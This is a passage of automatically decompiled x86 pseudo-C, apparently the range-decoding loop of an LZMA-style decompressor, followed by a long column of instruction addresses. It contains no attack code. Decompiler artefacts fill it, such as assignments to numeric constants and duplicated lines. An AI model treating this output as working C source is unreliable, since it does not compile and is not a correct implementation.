													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                              0x00000000
                                              0x004065d2
                                              0x004065d2
                                              0x004065d6
                                              0x004065f7
                                              0x004065fe
                                              0x00406604
                                              0x0040660a
                                              0x0040661c
                                              0x00406622
                                              0x00406627
                                              0x00000000
                                              0x004065d8
                                              0x004065de
                                              0x0040699f
                                              0x0040699f
                                              0x0040699f
                                              0x004069a2
                                              0x004069a2
                                              0x004069a2
                                              0x004069a8
                                              0x004069ae
                                              0x004069b4
                                              0x004069ce
                                              0x004069d1
                                              0x004069d7
                                              0x004069e2
                                              0x004069e4
                                              0x004069b6
                                              0x004069b6
                                              0x004069c5
                                              0x004069c9
                                              0x004069c9
                                              0x004069ee
                                              0x00000000
                                              0x00000000
                                              0x004069f0
                                              0x004069f4
                                              0x00406ba3
                                              0x00406bb9
                                              0x00406bc1
                                              0x00406bc8
                                              0x00406bca
                                              0x00406bd1
                                              0x00406bd5
                                              0x00406bd5
                                              0x00406a00
                                              0x00406a07
                                              0x00406a0f
                                              0x00406a12
                                              0x00406a15
                                              0x00406a15
                                              0x00406a1b
                                              0x00406a1b
                                              0x004061b7
                                              0x004061b7
                                              0x004061b7
                                              0x004061c0
                                              0x00000000
                                              0x00000000
                                              0x004061c6
                                              0x00000000
                                              0x004061d1
                                              0x00000000
                                              0x00000000
                                              0x004061da
                                              0x004061dd
                                              0x004061e0
                                              0x004061e4
                                              0x00000000
                                              0x00000000
                                              0x004061ea
                                              0x004061ed
                                              0x004061ef
                                              0x004061f0
                                              0x004061f3
                                              0x004061f5
                                              0x004061f6
                                              0x004061f8
                                              0x004061fb
                                              0x00406200
                                              0x00406205
                                              0x0040620e
                                              0x00406221
                                              0x00406224
                                              0x00406230
                                              0x00406258
                                              0x0040625a
                                              0x00406268
                                              0x00406268
                                              0x0040626c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040625c
                                              0x0040625c
                                              0x0040625f
                                              0x00406260
                                              0x00406260
                                              0x00000000
                                              0x0040625c
                                              0x00406236
                                              0x0040623b
                                              0x0040623b
                                              0x00406244
                                              0x0040624c
                                              0x0040624f
                                              0x00000000
                                              0x00406255
                                              0x00406255
                                              0x00000000
                                              0x00406255
                                              0x00000000
                                              0x00406272
                                              0x00406272
                                              0x00406276
                                              0x00406b22
                                              0x00000000
                                              0x00406b22
                                              0x0040627f
                                              0x0040628f
                                              0x00406292
                                              0x00406295
                                              0x00406295
                                              0x00406295
                                              0x00406298
                                              0x0040629c
                                              0x00000000
                                              0x00000000
                                              0x0040629e
                                              0x004062a4
                                              0x004062ce
                                              0x004062d4
                                              0x004062db
                                              0x00000000
                                              0x004062db
                                              0x004062aa
                                              0x004062ad
                                              0x004062b2
                                              0x004062b2
                                              0x004062bd
                                              0x004062c5
                                              0x004062c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040630d
                                              0x00406313
                                              0x00406316
                                              0x00406323
                                              0x0040632b
                                              0x00000000
                                              0x00000000
                                              0x004062e2
                                              0x004062e2
                                              0x004062e6
                                              0x00406b31
                                              0x00000000
                                              0x00406b31
                                              0x004062f2
                                              0x004062fd
                                              0x004062fd
                                              0x004062fd
                                              0x00406300
                                              0x00406303
                                              0x00406306
                                              0x0040630b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004069a2
                                              0x004069a2
                                              0x004069a8
                                              0x004069ae
                                              0x004069b4
                                              0x004069ce
                                              0x004069d1
                                              0x004069d7
                                              0x004069e2
                                              0x004069e4
                                              0x004069b6
                                              0x004069b6
                                              0x004069c5
                                              0x004069c9
                                              0x004069c9
                                              0x004069ee
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406333
                                              0x00406335
                                              0x00406338
                                              0x004063a9
                                              0x004063ac
                                              0x004063af
                                              0x004063b6
                                              0x004063c0
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x0040633a
                                              0x0040633e
                                              0x00406341
                                              0x00406343
                                              0x00406346
                                              0x00406349
                                              0x0040634b
                                              0x0040634e
                                              0x00406350
                                              0x00406355
                                              0x00406358
                                              0x0040635b
                                              0x0040635f
                                              0x00406366
                                              0x00406369
                                              0x00406370
                                              0x00406374
                                              0x0040637c
                                              0x0040637c
                                              0x0040637c
                                              0x00406376
                                              0x00406376
                                              0x00406376
                                              0x0040636b
                                              0x0040636b
                                              0x0040636b
                                              0x00406380
                                              0x00406383
                                              0x004063a1
                                              0x004063a3
                                              0x00000000
                                              0x00406385
                                              0x00406385
                                              0x00406388
                                              0x0040638b
                                              0x0040638e
                                              0x00406390
                                              0x00406390
                                              0x00406390
                                              0x00406393
                                              0x00406396
                                              0x00406398
                                              0x00406399
                                              0x0040639c
                                              0x00000000
                                              0x0040639c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040663c
                                              0x00406640
                                              0x00406663
                                              0x00406666
                                              0x00406669
                                              0x00406673
                                              0x00406642
                                              0x00406642
                                              0x00406645
                                              0x00406648
                                              0x0040664b
                                              0x00406658
                                              0x0040665b
                                              0x0040665b
                                              0x0040699f
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x00000000
                                              0x0040667f
                                              0x00406683
                                              0x00000000
                                              0x00000000
                                              0x00406689
                                              0x0040668d
                                              0x00000000
                                              0x00000000
                                              0x00406693
                                              0x00406695
                                              0x00406699
                                              0x00406699
                                              0x0040669c
                                              0x004066a0
                                              0x00000000
                                              0x00000000
                                              0x004066f0
                                              0x004066f4
                                              0x004066fb
                                              0x004066fe
                                              0x00406701
                                              0x0040670b
                                              0x0040699f
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x0040699f
                                              0x004066f6
                                              0x00000000
                                              0x00000000
                                              0x00406717
                                              0x0040671b
                                              0x00406722
                                              0x00406725
                                              0x00406728
                                              0x0040671d
                                              0x0040671d
                                              0x0040671d
                                              0x0040672b
                                              0x0040672e
                                              0x00406731
                                              0x00406731
                                              0x00406734
                                              0x00406737
                                              0x0040673a
                                              0x0040673a
                                              0x0040673d
                                              0x00406744
                                              0x00406749
                                              0x00000000
                                              0x00000000
                                              0x004067d7
                                              0x004067d7
                                              0x004067db
                                              0x00406b79
                                              0x00000000
                                              0x00406b79
                                              0x004067e1
                                              0x004067e4
                                              0x004067e7
                                              0x004067eb
                                              0x004067ee
                                              0x004067f4
                                              0x004067f6
                                              0x004067f6
                                              0x004067f6
                                              0x004067f9
                                              0x004067fc
                                              0x00000000
                                              0x00000000
                                              0x004063cc
                                              0x004063cc
                                              0x004063d0
                                              0x00406b3d
                                              0x00000000
                                              0x00406b3d
                                              0x004063d6
                                              0x004063d9
                                              0x004063dc
                                              0x004063e0
                                              0x004063e3
                                              0x004063e9
                                              0x004063eb
                                              0x004063eb
                                              0x004063eb
                                              0x004063ee
                                              0x004063f1
                                              0x004063f1
                                              0x004063f4
                                              0x004063f7
                                              0x00000000
                                              0x00000000
                                              0x004063fd
                                              0x00406403
                                              0x00000000
                                              0x00000000
                                              0x00406409
                                              0x00406409
                                              0x0040640d
                                              0x00406410
                                              0x00406413
                                              0x00406416
                                              0x00406419
                                              0x0040641a
                                              0x0040641d
                                              0x0040641f
                                              0x00406425
                                              0x00406428
                                              0x0040642b
                                              0x0040642e
                                              0x00406431
                                              0x00406434
                                              0x00406437
                                              0x00406453
                                              0x00406456
                                              0x00406459
                                              0x0040645c
                                              0x00406463
                                              0x00406467
                                              0x00406469
                                              0x0040646d
                                              0x00406439
                                              0x00406439
                                              0x0040643d
                                              0x00406445
                                              0x0040644a
                                              0x0040644c
                                              0x0040644e
                                              0x0040644e
                                              0x00406470
                                              0x00406477
                                              0x0040647a
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406485
                                              0x00406485
                                              0x00406489
                                              0x00406b49
                                              0x00000000
                                              0x00406b49
                                              0x0040648f
                                              0x00406492
                                              0x00406495
                                              0x00406499
                                              0x0040649c
                                              0x004064a2
                                              0x004064a4
                                              0x004064a4
                                              0x004064a4
                                              0x004064a7
                                              0x004064aa
                                              0x004064aa
                                              0x004064aa
                                              0x004064b0
                                              0x00000000
                                              0x00000000
                                              0x004064b2
                                              0x004064b5
                                              0x004064b8
                                              0x004064bb
                                              0x004064be
                                              0x004064c1
                                              0x004064c4
                                              0x004064c7
                                              0x004064ca
                                              0x004064cd
                                              0x004064d0
                                              0x004064e8
                                              0x004064eb
                                              0x004064ee
                                              0x004064f1
                                              0x004064f1
                                              0x004064f4
                                              0x004064f8
                                              0x004064fa
                                              0x004064d2
                                              0x004064d2
                                              0x004064da
                                              0x004064df
                                              0x004064e1
                                              0x004064e3
                                              0x004064e3
